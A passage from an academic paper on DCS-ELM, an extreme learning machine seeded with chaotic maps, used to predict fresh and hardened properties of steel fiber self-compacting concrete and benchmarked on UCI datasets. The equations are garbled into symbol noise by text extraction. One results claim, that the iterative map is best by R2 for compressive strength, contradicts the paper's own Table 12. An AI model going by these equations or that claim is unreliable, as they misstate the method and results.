2010). In order for a systemic behavior to be called chaotic, it must comply with the following conditions. � It must be sensitive to the starting conditions, that is to say excessively dependent, � It must contain a nonlinear element, � Discrete-time systems should have at least a first order, continuous time systems should have at least a third order differential equation. Chaos theory has a much broader structure than that summarized here. There are many derivatives of chaotic systems. These chaotic system classes; It can be listed as discrete time, continuous time, time delay and hyper chaotic systems. Each of these chaotic classes of systems has its own advantages and disadvantages. Discrete-time chaotic systems have a significant advantage over other chaotic system models due to their high performance in computer applications with their simple mathematical models. Because of these advantages, we focused on discrete-time chaotic systems. Chaotic maps and their equations used in this study are listed in Table 1 and Fig. 2 includes sample distribution charts of chaotic maps. Proposed DCS-ELM Recently, chaotic number sequences replacing random number sequences have been used in secure communication (Caponetto et al., 1998), improving the performance of optimization methods (Alatas, 2010; Altay & Alatas, 2020), artificial neural networks (Nozawa, 1992) and nonlinear circuits (Arena et al., 2000). More successful results have been obtained in some applications. The parts to be determined by the user in the basic ELM algorithm are determined as the activation function and the number of hidden layers. ELM algorithm randomly Altay et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.411 6/31 http://dx.doi.org/10.7717/peerj-cs.411 https://peerj.com/computer-science/ generates input weights and bias value. As a result of the random generation of these values, the distribution of the values is not good, and the desired performance cannot be obtained from the ELM algorithm from time to time. The basic ELM algorithm is shown in Table 2. In the proposed algorithm, input weights and bias values are created by using chaotic maps instead of random. In this way, it is aimed to eliminate the disadvantages caused by random generation. The flow of the proposed DCS-ELM is given in Table 3. Performance of the proposed algorithm according to ELM and basic machine learning algorithm is shown in the next sections. 10-k cross validation In the 10-k cross validation method, the data set is primarily randomly distributed. Then the data set was divided into 10 parts. While each piece was used as a test data set, the remaining 9 pieces were used as a training set, respectively. With the 10-k cross validation method, more consistent results can be obtained by using each data in the data set as test data. A simple representation of the 10-k cross validation method is given in the Table 4. Evaluation metrics In the study, using evaluation criteria are R-squared, root mean absolute error (RMSE) and mean absolute error (MAE). The equations of the evaluation criteria used are expressed as follows: R2 ¼ 1 � P j tj � oj � �2 P j tj � t̂ � �2 ! (7) Table 1 Equations and parameters of chaotic maps. Chaotic Maps Equations Parameters Chebyshev Map Xnþ1 ¼ cos kcos�1xnð Þ – Iterative Map Xnþ1 ¼ sin ap xn � � a ¼ 0:9 Logistic Map Xnþ1 ¼ aXn 1 � Xnð Þ a ¼ 4 Piecewise Map xnþ1 ¼ xn P ; 0 � xn , P xn � P 0:5 � P ; P � xn , 0:5 1 � P � xn 0:5 � P ; 0:5 � xn , 1 � P 1 � xn P ; 1 � P � xn < 1 8>>>>>>>>< >>>>>>>>: P ¼ 0:4 Tent Map Xnþ1 ¼ xn 0:7 ; xn � 0:7 10 3 Xnð1 � XnÞ; de�gilse: 8>< >: – Altay et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.411 7/31 http://dx.doi.org/10.7717/peerj-cs.411 https://peerj.com/computer-science/ RMSE ¼ ffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffi 1 p � � � X j tj � oj 2s (8) MAE ¼ 1 p Xp i¼1 ti � oj (9) where o are the experimental values, t are the predicted values of the machine learning algorithms, t̂ are the average of all experimental values and p are the number of samples. Figure 2 Distributions of chaotic maps. (A) Chebyshev. (B) Iterative. (C) Logistic. (D) Piecewise. (E) Tent. Full-size DOI: 10.7717/peerj-cs.411/fig-2 Altay et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.411 8/31 http://dx.doi.org/10.7717/peerj-cs.411/fig-2 http://dx.doi.org/10.7717/peerj-cs.411 https://peerj.com/computer-science/ DATASETS In this section, the data sets used to evaluate the performance of the proposed DCS-ELM algorithm and other algorithms are explained. First, SFRSCC data set is explained and then public data sets are explained. Self-compacting steel fiber concrete In the application of the proposed algorithm, a special type of concrete, self-compacting steel fiber concrete is used. A total of 4 different concrete tests were selected from the fresh and hardened concrete tests. V-funnel, T50 and slump-flow tests used to determine fresh concrete performance and concrete compressive strength tests used to determine the performance of hardened concrete were used. In the selection of the data set, machine learning methods have not been applied before, they have the same number of input Table 2 Basic ELM algorithm. ELM In a given training set @ ¼ xi; tið Þ k xi 2 Rn; ti 2 Rm; i ¼ 1; . . . ; Nf g, activation function g xð Þ and hidden nodes ~N; Step 1: Assign randomly; weight wi and bias value bi, i ¼ 1; . . . ; ~N. Step 2: Compute the hidden layer output matrix H. Step 3: Calculate the output weight b ¼ H�T, T ¼ t1; . . . ; tN½ �T. The inverse of the H matrix is taken using Moore–Penrose H�. Table 3 DCS-ELM algorithm. DCS-ELM In a given training set @ ¼ xi; tið Þ k xi 2 Rn; ti 2 Rm; i ¼ 1; . . . ; Nf g, activation function g xð Þ and hidden nodes ~N; Step 1: Assign using chaotic maps; weight wi and bias value bi, i ¼ 1; . . . ; ~N. Step 2: Compute the hidden layer output matrix H. Step 3: Calculate the output weight b ¼ H�T, T ¼ t1; . . . ; tN½ �T. The inverse of the H matrix is taken using Moore–Penrose H�. Table 4 10-k cross-validation simple representation. Test Train Train Train Train Train Train Train Train Train Train Test Train Train Train Train Train Train Train Train Train Train Test Train Train Train Train Train Train Train Train Train Train Test Train Train Train Train Train Train Train Train Train Train Test Train Train Train Train Train Train Train Train Train Train Test Train Train Train Train Train Train Train Train Train Train Test Train Train Train Train Train Train Train Train Train Train Test Train Train Train Train Train Train Train Train Train Train Test Train Train Train Train Train Train Train Train Train Train Test Altay et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.411 9/31 http://dx.doi.org/10.7717/peerj-cs.411 https://peerj.com/computer-science/ parameters, but the effect values of the parameters are different according to the experiments, there are not enough data sets in the literature and it is more difficult to obtain a successful performance with machine learning methods compared to different data sets. The data sets used were obtained from our own experiments and theses and articles obtained from the literature. 60 data sets were used in the models designed for V-funnel, 108 data sets in the model designed for T50, 122 data sets in the model designed for slump-flow, and 67 data in the model designed for compressive strength. The data in Table 5 are obtained from the experimental studies and the studies in Table 6 are obtained from the literature. The input parameters in the data set are cement (C), silica fume+silica powder+stone fume (S), fly ash (FA), maximum aggregate size (Dmax), fine aggregate (Fi), coarse aggregate (CA), water (W), chemical additive (A), amount of steel fiber (StF), diameter of steel fiber (FD) and length of steel fiber (FD). The output parameters in the data set are v-funnel (VF), T50, slump-flow (SF) and compressive strength (Fc). Silica fume, silica powder and stone fume are reduce the workability of the fresh concrete takes as group (Altay, Ulas & Alyamac, 2020). The effect of this group on the performance of concrete that has been hardened before 28 days is negligible. Public datasets The energy, house and servo data sets obtained from public data set sharing platform UCI are explained (Dua & Graff, 2019). Energy Energy data set consists of 8 inputs and 2 outputs. Input values consist of relative compactness, surface area, wall area, roof area, overall height, orientation, glazing area and glazing area distrubution. Output values consist of heating load and cooling load. It has been examined separately for two different output values. There are 768 sample data in the data set created by considering the output variables of different buildings (Tsanas & Xifara, 2012). House In the House data set, between June 2012 and May 2013, data from 4 different regions is beyond the supply and demand circle. There are a total of 414 sample data in the data set. Table 5 Data from experiment, input and output parameters of SFRSCC for v-funnel, T50, slump-flow and compressive strength models. Mix Code C kg/m3 S kg/m3 Dmax (mm) Fi kg/m3 CA kg/m3 W L A L StF kg/m3 FD mm FL mm VF (s) T50 (s) SF (cm) fc (MPa) C-1 400 40 16 874 715 240 6 24 0.75 30 5.73 3.9 66 45.5 C-2 380 80 16 901 737 216 5.4 24 0.75 30 9.75 1.9 64 55.8 C-3 380 80 16 901 737 216 5.4 55 0.75 30 7.26 2.1 63 52.6 C-4 420 100 16 873 715 228 5.7 24 0.75 30 12.88 2.9 75 36.2 C-5 420 200 16 819 670 228 5.7 24 0.75 30 6.56 2 81 49.8 C-6 420 200 16 819 670 228 5.7 55 0.75 30 – 2.3 77 46.6 C-7 400 140 16 819 670 240 6 24 0.75 30 5.64 1.3 75 51.6 C-8 420 100 8 1399 0 285.6 6.3 24 0.75 30 – – – 36.3 Altay et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.411 10/31 http://dx.doi.org/10.7717/peerj-cs.411 https://peerj.com/computer-science/ Table 6 Data from literature, input and output parameters of SFRSCC for v-funnel, T50, slump-flow and compressive strength models. Ref C kg/m3 S kg/m3 FA kg/m3 Dmax (mm) Fi kg/m3 CA Kg/m3 W l A kg/m3 StF kg/m3 FD mm FL mm VF s T50 s SF cm fc MPa Korkmaz (2011) 350 0 150 16 865.3 787 793.8 200 12.5 40 60 0.75 0.9 30 60 13 15 3 3.8 54 66 49.2 54.1 Nis (2017) 420 0 180 10 777 636 120 3.6 4.2 39 78 0.16 0.55 13 35 6 6.5 3 4 79 80 58.9 62 Rao & Ravindra (2010) 390 0 210 16 735 749 769 783 186 2.9 3 39.3 117.8 0.92 13.8 32.2 7.4 11.8 4.4 5 56.5 68.5 45.2 47.6 Bozkurt (2009) 350 0 150 16 865 797 798 200 4.4 46 50 0.1 0.6 40 80 11 18 1.9 3.2 69 75 62.4 72.6 Kassimi (2013) 475 0 0 20 801 813 745 763 200 5.1 24 39 0.55 30 2.4 2.6 1.1 1.3 68 70 47.9 50.6 Tezel (2010) 350 561 150 16 494 816 164.5 4.2 5.25 10 90 0.16 0.9 13 60 13 60 4 10 71 74 – Sahmaran & Yaman (2007) 250 70 250 19 889 924 530 549 205 226 11.8 60 0.16 0.55 6 30 2.7 2.8 2 66 70 – Sahmaran, Yurtseven & Yaman (2005) 500 70 250 19 977 578 200 9.5 60 0.16 0.55 6 30 9.2 2.6 4.3 62 67.5 Corinaldesi & Moriconi (2009) 500 58 70 0 16 1,080 420 200 7 50 0.7 30 5 7 1 3 66 70 – Gencel et al. (2011) 400 0 120 16 427.7 431.7 1295.6 1307.7 160 6 15 60 0.5 30 16.4 20.7 4.3 4.7 58.2 69.2 – Korkut et al. (2017) 350 30 100 16 870 750 140 5.6 19.6 58.8 0.75 0.9 30 60 6.1 18.1 1.9 5.1 59 68 – Berbergil (2006) 350 0 150 16 738 744 749 760 235 4.5 8 30 60 0.75 60 4.6 12.3 – 65 71 49.2 54.1 Yıldırım, Sertbaş & Berbergil (2007) 350 0 150 16 731 736 747 752 235 3.15 5.6 30 60 0.75 60 5.09 12.3 – – 49.2 55.6 Dinç (2007) 440 824 308 623 0 16 315 610 198 6.6 8.2 78 0.75 30 – 9 15 63 67 – El-Dieb & Taha (2012) 350 500 40 42 0 19 687 736 1030 1104 173 176 7 10 40 160 0.16 0.5 8 30 – 8.5 17 52 68 – Deeb (2013) 500 275 0 10 700 833 138 19 39 0.6 30 – 3 76 – Ouedraogo (2018) 480 0 0 16 1,087 592 192 10.43 11.3 46.8 0.55 1 30 50 – 2.7 4.9 64 66 68.2 71.1 Pająk & Ponikiewski (2013) 490 0 0 8 808 808 201 19 40 120 0.4 0.8 12.5 30 – 2 6 64 68 80.1 98.2 Frazão et al. (2015) 413 353 0 19 908 640 127.8 7.8 60 0.5 30 – 15.6 66.7 – Torrijos, Barragan & Zerbino (2008) 334 100 0 18 939 775 164 12.7 25 1 50 – 1.7 – Majdzadeh (2003) 420 24.7 49.4 10 695 1042 123.5 20 58.9 78.5 0.25 1 6.5 50 – – 61 72 – Jansson et al. (2012) 357 368 172 207 0 16 829 969 608 763 189 202 1.3 20 80 0.65 30 – – – 50 59 Long et al. (2014) 420 500 0 0 20 815 957 247 252 1.5 1.9 20 0.7 30 60 – – – 37.3 63.7 Altay et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.411 11/31 http://dx.doi.org/10.7717/peerj-cs.411 https://peerj.com/computer-science/ The input parameters of the data set consist of 6 different parameters: transaction date, age, distance to the nearest MRT station, the number of convenience stores in the living circle on foot and the geographic coordinate (latitude and longitude). The exit value is the price of the house (Yeh & Hsu, 2018). Servo There are 167 sample data in the servo data set. The input parameters of the data set are engine, screw, pgain and vgain. Output values constitute the rise time of the servomechanism. The dataset created by Karl Ulrich covers a nonlinear phenomenon (Quinlan, 1992, 1993). RESULTS AND DISCUSSION In this study, the DCS-ELM algorithm, which was proposed for the first time using chaotic maps, was tested in 8 different regression datasets. In this section, first of all, the performances of DCS-ELM and other algorithms proposed on public data sets were examined and compared. Then, performances of DCS-ELM and other algorithms in SFRSCC datasets were examined and compared. Finally, a general evaluation of DCS-ELM and other algorithms proposed on 8 different data sets was made according to the RMSE value. Performance experiment results on public data sets The proposed DCS-ELM algorithm using 5 different chaotic maps on 4 different public data sets is compared with the, LR (Altay et al., 2020), SVR (Altay et al., 2020), WELM (Ulas et al., 2019), KELM (Ulas et al., 2019; Yang et al., 2018) and basic ELM algorithm (Cao et al., 2018). LR and SVR algorithms are used with basic property parameters. The number of input, output, activation function and hidden neuron used in DCS-ELM, basic ELM, WELM and KELM are given in the Tables 7 and 8. The 10-k cross validation method was used to test the designed models. The basic ELM, WELM and KELM algorithms were run 100 times and the R2, RMSE and MAE values were averaged. Table 9 shows the results of basic ELM, LR, SVR, WELM, KELM and DCS-ELM algorithms for public data sets. A new approach for the SFRSCC using DCS-ELM SFRCSCC’s fresh and hardened concrete experiments performances were predicted using the proposed DCS-ELM algorithm using the basic ELM algorithm and 5 different chaotic maps. Parameters used in ELM and DCS-ELMs are taken exactly the same in all designed models in order to ensure a healthy comparison. The input, output, activation function and the number of hidden neurons of the basic ELM algorithm, WELM and DCS-ELM are shown in Table 10. KELM algorithm architecture shown in Table 11. In order to compare the ELM algorithm with the chaotic map-based ELM algorithms, the ELM algorithm was run 100 times and the evaluation criteria were averaged. All designed models were tested using the 10-k cross validation test method. R2, RMSE and MAE values were calculated separately for each model. Altay et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.411 12/31 http://dx.doi.org/10.7717/peerj-cs.411 https://peerj.com/computer-science/ In Fig. 3, the ELM algorithm of the v-funnel experiment and the prediction and experimental values of 5 different DCS-ELM algorithms are given, and Fig. 4 shows the differences between the prediction and experimental values. As it can be understood from Fig. 3 and Fig. 4, ELM algorithm using iterative maps showed the best performance. DCS-ELM algorithm using chebyshev and logistic maps follow DCS-ELM using iterative maps. Figure 5 shows the ELM algorithm of the T50 experiment and the prediction and experimental values of 5 different DCS-ELM algorithms. Figure 6 shows the differences between prediction and experimental values. As seen in Figs. 5 and 6, the algorithms have shown similar performances to each other. Logistic map-based DCS-ELM algorithm Table 9 Results of public datasets. EM LR SVR WELM k = 100 KELM k = 100 ELM k = 100 DCS-ELM Chebyshev DCS-ELM Iterative DCS-ELM Logistic DCS-ELM Piecewise DCS-ELM Tent Energy1 R2 0.9200 0.9100 0.9336 0.9055 0.9809 0.8672 0.9905 0.8723 0.9826 0.9794 RMSE 2.9421 2.0973 2.5596 3.0598 1.5470 5.5700 1.2450 4.9494 1.6421 1.2402 MAE 2.0877 2.0435 1.9333 2.3510 1.0524 3.1354 0.8039 2.8124 1.0862 0.8969 Energy2 R2 0.8900 0.8800 0.9516 0.8838 0.9730 0.9478 0.9779 0.9626 0.9708 0.9636 RMSE 3.2188 3.2484 2.0968 3.1851 2.0885 2.2023 1.7219 2.4084 1.9607 2.6307 MAE 2.2643 2.2441 1.5415 2.3735 1.1709 1.5281 1.0744 1.5189 1.1168 1.2881 House R2 0.5700 0.5600 0.6041 0.0000 0.5677 0.5932 0.6087 0.5676 0.6143 0.5292 RMSE 8.9474 9.041 8.0768 29.2569 7.3118 7.2347 6.6873 7.4086 6.5335 7.2982 MAE 6.2745 6.2238 5.7113 24.6785 5.5837 5.7505 5.0731 5.7930 5.2752 5.7343 Servo R2 0.4800 0.1700 0.4936 0.6997 0.7893 0.7189 0.8271 0.2270 0.8265 0.7924 RMSE 1.1348 1.4304 1.0887 0.7698 0.4511 0.5118 0.3574 0.8743 0.6183 0.3832 MAE 0.9169 0.7850 0.7978 0.5153 0.3549 0.4323 0.2626 0.6280 0.4905 0.2798 Table 8 Architecture of KELM. Kernel parameter Activation function Output neuron Input neuron Energy1 6 RBF kernel 1 768 Energy2 6 RBF kernel 1 768 House 6 RBF kernel 1 414 Servo 6 RBF kernel 1 167 Table 7 Architecture of ELM, DCS-ELM and WELM. Hidden neuron Activation function Output neuron Input neuron Energy1 200 Sine 1 768 Energy2 300 Sine 1 768 House 20 Hardlim 1 414 Servo 50 Sigmoid 1 167 Altay et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.411 13/31 http://dx.doi.org/10.7717/peerj-cs.411 https://peerj.com/computer-science/ has succeeded in producing the best predictive values. The piecewise map based DCS-ELM algorithm has performed very close to the logistic map based DCS-ELM algorithm. In Fig. 7, the ELM algorithm of the slump-flow experiment and the prediction and experimental values of 5 different DCS-ELM algorithms are given and the differences between the prediction and experimental values are shown in Fig. 8. As can be seen from Figs. 7 and 8, the most successful performance in the slump-flow experiment was shown by the DCS-ELM algorithm using iterative map. The DCS-ELM algorithm using piecewise map produced predictive values close to the DCS-ELM algorithm using iterative map. Tent and logistic map-based DCS-ELM algorithm produced more distant values in predicted values than expected experimental values. Figure 9 shows the ELM algorithm of the compressive strength test and the prediction and experimental values of 5 different DCS-ELM algorithms. Figure 10 shows the differences between prediction and experimental values. As can be seen from Figs. 9 and 10, the methods in the compressive strength test have produced predictive values that are not far from each other. The DCS-ELM algorithm, which uses piecewise map, has managed to produce relatively better predictive values. R2, RMSE and MAE values for basic ELM and DCS-ELM are given separately in Table 12. In the V-funnel experiment, ELM algorithm obtained values of 0.6617, 2.8365 and 2.0797 for R2, RMSE and MAE values, respectively. Chebyshev map based DCS-ELM algorithm obtained values of 0.6894, 2.4968 and 2.2025 for R2, RMSE and MAE values, respectively. Iterative map-based DCS-ELM algorithm obtained values of 0.7056, 2.0798 and 1.6262 for R2, RMSE and MAE values, respectively. Logistic map based DCS-ELM algorithm obtained values of 0.6949, 2.8948 and 2.4825 for R2, RMSE and MAE values, respectively. The piecewise map based DCS-ELM algorithm obtained values of 0.6794, 2.7398 and 2.1089 for R2, RMSE and MAE values, respectively. Tent map-based DCS-ELM algorithm obtained values of 0.6656, 2.8453 and 2.5755 for R2, RMSE and MAE values, respectively. Table 10 Parameters of the ELM, WELM and DCS-ELM for SFRSCC. Hidden Neuron Activation function Output Neuron Input Neuron Vfunnel 5,000 Hard Limit 1 11 T50 5,000 Hard Limit 1 11 Slump-flow 5,000 Hard Limit 1 11 fc 5,000 Hard Limit 1 11 Table 11 Parameters of the KELM for SFRSCC. Kernel parameter Activation function Output Neuron Input Neuron Vfunnel 6 Lin kernel 1 11 T50 6 Lin kernel 1 11 Slump-flow 6 Lin kernel 1 11 fc 6 Lin kernel 1 11 Altay et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.411 14/31 http://dx.doi.org/10.7717/peerj-cs.411 https://peerj.com/computer-science/ In the T50 experiment, ELM algorithm obtained values of 0.8565, 1.0099 and 0.7960 for R2, RMSE and MAE values, respectively. Chebyshev map-based DCS-ELM algorithm obtained values of 0.8499, 0.9122 and 0.7198 for R2, RMSE and MAE values, respectively. The iterative map-based DCS-ELM algorithm obtained the values of 0.8533, 1.0020 and 0.7318 for R2, RMSE and MAE values, respectively. Logistic map-based DCS-ELM algorithm obtained values of 0.8687, 0.8541 and 0.6539 for R2, RMSE and MAE values, respectively. The piecewise map based DCS-ELM algorithm obtained values of 0.8665, Figure 3 Experimental and predictive values of DCS-ELM algorithm in the V-funnel experiment. (A) Chebyshev. (B) Itaretive. (C) Logistic. (D) Piecewise. (E) Tent. Full-size DOI: 10.7717/peerj-cs.411/fig-3 Altay et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.411 15/31 http://dx.doi.org/10.7717/peerj-cs.411/fig-3 http://dx.doi.org/10.7717/peerj-cs.411 https://peerj.com/computer-science/ 1.0644 and 0.8750 for R2, RMSE and MAE values, respectively. Tent map based DCS-ELM algorithm obtained values of 0.8528, 1.0727 and 0.7789 for R2, RMSE and MAE values, respectively. In the slump-flow experiment, the ELM algorithm obtained values of 0.6324, 2.7543 and 1.9247 for R2, RMSE and MAE values, respectively. Chebyshev map-based DCS-ELM algorithm obtained values of 0.6862, 2.4183 and 1.7383 for R2, RMSE and MAE values, respectively. Iterative map-based DCS-ELM algorithm obtained values of 0.6999, 2.1685 and 1.5668 for R2, RMSE and MAE values, respectively. Logistic map based DCS-ELM algorithm obtained values of 0.6453, 2.8308 and 2.0878 for R2, RMSE and MAE values, respectively. The piecewise map based DCS-ELM algorithm obtained values of 0.6942, 2.1747 and 1.4862 for R2, RMSE and MAE values, respectively. Tent map-based DCS-ELM Figure 4 Differences between the experimental and predictive values of DCS-ELM algorithm in the V-funnel experiment. (A) Chebyshev. (B) Iterative. (C) Logistic. (D) Piecewise. (E) Tent. Full-size DOI: 10.7717/peerj-cs.411/fig-4 Altay et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.411 16/31 http://dx.doi.org/10.7717/peerj-cs.411/fig-4 http://dx.doi.org/10.7717/peerj-cs.411 https://peerj.com/computer-science/ algorithm obtained values of 0.6251, 3.0299 and 1.7589 for R2, RMSE and MAE values, respectively. In the compressive strength experiment, ELM algorithm obtained values of 0.7604, 5.5749 and 4.1536 for R2, RMSE and MAE values, respectively. Chebyshev map-based DCS-ELM algorithm obtained values of 0.7905, 6.2847 and 4.8892 for R2, RMSE and MAE values, respectively. The iterative map based DCS-ELM algorithm obtained values of 0.8183, 5.2188 and 3.7992 for R2, RMSE and MAE values, respectively. Logistics map based DCS-ELM algorithm obtained values of 0.7882, 4.4419 and 3.3678 for R2, RMSE and MAE Figure 5 Experimental and predictive values of DCS-ELM algorithm in T50 experiment. (A) Chebyshev. (B) Iterative. (C) Logistic. (D) Piecewise. (E) Tent. Full-size DOI: 10.7717/peerj-cs.411/fig-5 Altay et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.411 17/31 http://dx.doi.org/10.7717/peerj-cs.411/fig-5 http://dx.doi.org/10.7717/peerj-cs.411 https://peerj.com/computer-science/ values, respectively. The piecewise map based DCS-ELM algorithm obtained values of 0.8235, 4.8539 and 3.3575 for R2, RMSE and MAE values, respectively. Tent map based DCS-ELM algorithm obtained values of 0.7750, 4.8080 and 3.5935 for R2, RMSE and MAE values, respectively. Figure 11 shows the performances of ELM and DCS-ELM algorithms in 4 different data sets according to the R2 value. In the V-Funnel experiment, it is an iterative map-based DCS-ELM algorithm that gives the best result according to the R2 evaluation criteria. This algorithm performed 6.63% better than the basic ELM algorithm, 6% better than the tent map based DCS-ELM algorithm, 3.86% better than the piecewise map based DCS-ELM algorithm, 2.35% better than the Chebyshev map based DCS-ELM algorithm and 1.54% better than the logistic map based DCS-ELM algorithm. Figure 6 Differences between the experimental and predictive values of DCS-ELM algorithm in the T50 experiment. (A) Chebyshev. (B) Iterative. (C) Logistic. (D) Piecewise. (E) Tent. Full-size DOI: 10.7717/peerj-cs.411/fig-6 Altay et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.411 18/31 http://dx.doi.org/10.7717/peerj-cs.411/fig-6 http://dx.doi.org/10.7717/peerj-cs.411 https://peerj.com/computer-science/ In the T50 experiment, it is the logistic map based DCS-ELM algorithm that gives the best result according to the R2 evaluation criteria. This algorithm has performed 2.21% better than Chebyshev map based DCS-ELM algorithm, 1.86% better than the tent map based DCS-ELM algorithm, 1.80% better than the iterative map based DCS-ELM algorithm, 1.42% better than the basic ELM algorithm and 0.25% better than the piecewise map based DCS-ELM algorithm. Figure 7 Experimental and predictive values of DCS-ELM algorithm in the slump-flow experiment. (A) Chebyshev. (B) Iterative. (C) Logistic. (D) Piecewise. (E) Tent. Full-size DOI: 10.7717/peerj-cs.411/fig-7 Altay et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.411 19/31 http://dx.doi.org/10.7717/peerj-cs.411/fig-7 http://dx.doi.org/10.7717/peerj-cs.411 https://peerj.com/computer-science/ In the slump-flow experiment it is the iterative map based DCS-ELM algorithm that gives the best result according to the R2 evaluation criteria. This algorithm has performed 11.97% better than the tent map-based DCS-ELM algorithm, 10.67% better than the basic ELM algorithm, 8.46% better than the logistic map-based DCS-ELM algorithm, 2% better than the Chebyshev map-based DCS-ELM algorithm and 0.82% better than the piecewise map-based DCS-ELM algorithm. In the compressive strength experiment it is the iterative map based DCS-ELM algorithm that gives the best result according to the R2 evaluation criteria. This algorithm has performed 8.3% better than the basic ELM algorithm, 6.26% better than the tent map based DCS-ELM algorithm, 4.48% better than the logistic map based DCS-ELM algorithm, 4.17% better than Chebyshev map based DCS-ELM and 0.64% better than the iterative map based DCS-ELM algorithm. Figure 8 Differences between the experimental and predictive values of DCS-ELM algorithm in the slump-flow experiment. (A) Chebyshev. (B) Iterative. (C) Logistic. (D) Piecewise. (E) Tent. Full-size DOI: 10.7717/peerj-cs.411/fig-8 Altay et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.411 20/31 http://dx.doi.org/10.7717/peerj-cs.411/fig-8 http://dx.doi.org/10.7717/peerj-cs.411 https://peerj.com/computer-science/ Figure 12 shows the performances of ELM and DCS-ELM algorithms in 4 different data sets according to the RMSE value. In the V-Funnel experiment, the iterative map- based DCS-ELM algorithm, which gives the best performance according to the RMSE evaluation criteria, is 28.15% better than the logistic map-based DCS-ELM algorithm, 26.9% better than the tent map-based DCS-ELM algorithm, 26.68% better than the basic ELM algorithm, 24.09% better than the piecewise map-based DCS-ELM algorithm and 16.7% better than the Chebyshev map-based DCS-ELM algorithm. Figure 9 Experimental and predictive values of DCS-ELM algorithm in compressive strength test. (A) Chebyshev. (B) Iterative. (C) Logistic. (D) Piecewise. (E) Tent. Full-size DOI: 10.7717/peerj-cs.411/fig-9 Altay et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.411 21/31 http://dx.doi.org/10.7717/peerj-cs.411/fig-9 http://dx.doi.org/10.7717/peerj-cs.411 https://peerj.com/computer-science/ In the T50 experiment, the logistic map-based DCS-ELM algorithm, which gives the best performance according to the RMSE evaluation criteria, is 20.38% better than the tent map-based DCS-ELM algorithm, 19.76% better than the piecewise map-based DCS-ELM algorithm, 15.43% better than the basic ELM algorithm, 14.76% better than the iterative map-based DCS-ELM algorithm and 6.37% better than the Chebyshev map-based DCS-ELM algorithm. In the slump-flow experiment, the iterative map-based DCS-ELM algorithm, which gives the best performance according to the RMSE evaluation criteria, is 28.43% better than the tent map-based DCS-ELM algorithm, 23.4% better than the logistic map-based DCS-ELM algorithm, 21.27% better than the basic ELM algorithm, 10.33% better than the Chebyshev map-based DCS-ELM algorithm and 0.29% better than the piecewise map- based DCS-ELM algorithm. Figure 10 Differences between the experimental and predicted values of DCS-ELM algorithm in compressive strength test. (A) Chebyshev. (B) Iterative. (C) Logistic. (D) Piecewise. (E) Tent. Full-size DOI: 10.7717/peerj-cs.411/fig-10 Altay et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.411 22/31 http://dx.doi.org/10.7717/peerj-cs.411/fig-10 http://dx.doi.org/10.7717/peerj-cs.411 https://peerj.com/computer-science/ In the compressive strength experiment, the logistic map-based DCS-ELM algorithm, which gives the best performance according to the RMSE evaluation criteria, is 29.32% better than the tent map-based DCS-ELM algorithm, 20.32% better than the basic ELM algorithm, 14.89% better than the iterative map-based DCS-ELM algorithm, 8.49% better than the piecewise map-based DCS-ELM algorithm and 6.37% better than the Chebyshev map-based DCS-ELM algorithm. Figure 13 shows the performances of ELM and DCS-ELM algorithms in 4 different data sets according to the MAE value. In the V-Funnel experiment, the iterative map-based DCS-ELM algorithm, which gives the best performance according to the MAE evaluation criteria, is 36.86% better than the tent map-based DCS-ELM algorithm, 34.49% better Table 12 Comparison of the performances of ELM and DCS-ELM algorithms in SFRSCC data sets. Data sets Evaluation metrics ELM (k = 100) DCS-ELM (Chebyshev) DCS-ELM (Iterative) DCS-ELM (Logistic) DCS-ELM (Piecewise) DCS-ELM (Tent) V-funnel R2 0.6617 0.6894 0.7056 0.6949 0.6794 0.6656 RMSE 2.8365 2.4968 2.0798 2.8948 2.7398 2.8453 MAE 2.0797 2.2025 1.6262 2.4825 2.1089 2.5755 T50 R2 0.8565 0.8499 0.8533 0.8687 0.8665 0.8528 RMSE 1.0099 0.9122 1.0020 0.8541 1.0644 1.0727 MAE 0.7960 0.7198 0.7318 0.6539 0.8750 0.7789 Slump-flow R2 0.6324 0.6862 0.6999 0.6453 0.6942 0.6251 RMSE 2.7543 2.4183 2.1685 2.8308 2.1747 3.0299 MAE 1.9247 1.7383 1.5668 2.0878 1.4862 1.7589 fc R2 0.7604 0.7905 0.8183 0.7882 0.8235 0.7750 RMSE 5.5749 6.2847 5.2188 4.4419 4.8539 4.8080 MAE 4.1536 4.8892 3.7992 3.3678 3.3575 3.5935 Figure 11 Comparison of ELM and DCS-ELM algorithms according to R2 value in experiments. Full-size DOI: 10.7717/peerj-cs.411/fig-11 Altay et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.411 23/31 http://dx.doi.org/10.7717/peerj-cs.411/fig-11 http://dx.doi.org/10.7717/peerj-cs.411 https://peerj.com/computer-science/ than the logistic map-based DCS-ELM algorithm, 26.17% better than the Chebyshev map-based DCS-ELM, 22.89% better than the piecewise map-based DCS-ELM algorithm and 21.81% better than the basic ELM algorithm. In the T50 experiment, the logistic map-based DCS-ELM algorithm, which gives the best performance according to the MAE evaluation criteria, is 25.27% better than the piecewise map-based DCS-ELM algorithm, 17.87% better than the basic ELM algorithm, 16.04% better than the tent map-based DCS-ELM, 10.65% better than the iterative map-based DCS-ELM algorithm and 9.16% better than the Chebyshev map-based DCS-ELM algorithm. In the slump-flow experiment, the iterative map-based DCS-ELM algorithm, which gives the best performance according to the MAE evaluation criteria, is 24.95% better Figure 12 Comparison of ELM and DCS-ELM algorithms according to RMSE value in experiments. Full-size DOI: 